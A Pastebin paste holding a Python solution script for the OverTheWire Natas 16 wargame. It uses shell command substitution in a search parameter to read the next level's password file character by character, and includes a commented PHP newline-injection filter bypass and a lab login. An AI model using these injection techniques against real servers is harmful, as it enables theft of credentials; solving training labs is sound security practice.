Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import pycurl, requests
- url = 'http://natas16.natas.labs.overthewire.org/index.php'
- username = 'natas16'
- password = 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'
- exists = 'administering'
- #doesnt_exist = 'This user doesn\'t exist.'
- def checkChar(knownStr, nextChar):
- ind = len(knownStr)
- check = knownStr + nextChar + ('_'*(32-ind-1))
- #urlAll = url+'?username=natas16" AND password LIKE BINARY "' + check
- urlAll = url+'/?needle=$(grep -E ^'+knownStr+nextChar+'.* /etc/natas_webpass/natas17)administering&submit=Search'
- #print urlAll
- r = requests.get(urlAll, auth=(username, password))
- #print r.status_code
- #print r.headers
- #print r.text
- #raw_input()
- return exists not in r.text
- #return doesnt_exist not in r.text
- knownStr = ""
- for i in range(len(knownStr) + 1, 33):
- print i, "symbol brutes:",
- charData = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
- for char in charData:
- print char,
- if checkChar(knownStr, char):
- knownStr += char
- print 'Found'
- break
- else:
- print 'Not Found'
- print "knownStr", knownStr
- #<?php
- #
- #$key = 'index.php\ncat /mnt/hgfs/_Share/infosec/overthewire/natas/pass\n ';
- #if(preg_match('/[;|&`\'"]/',$key)) {
- # print "Input contains an illegal character!";
- #} else {
- # print "Everithing OK!\n";
- # print "grep -i \"$key\" dictionary.txt\n";
- # $pass = exec("grep -i \"$key\" dictionary.txt");
- # print $pass;
- #}
- #
- ##intex.php%0Acat /etc/natas_webpass/natas16%0A
- #?>
Add Comment
Please, Sign In to add comment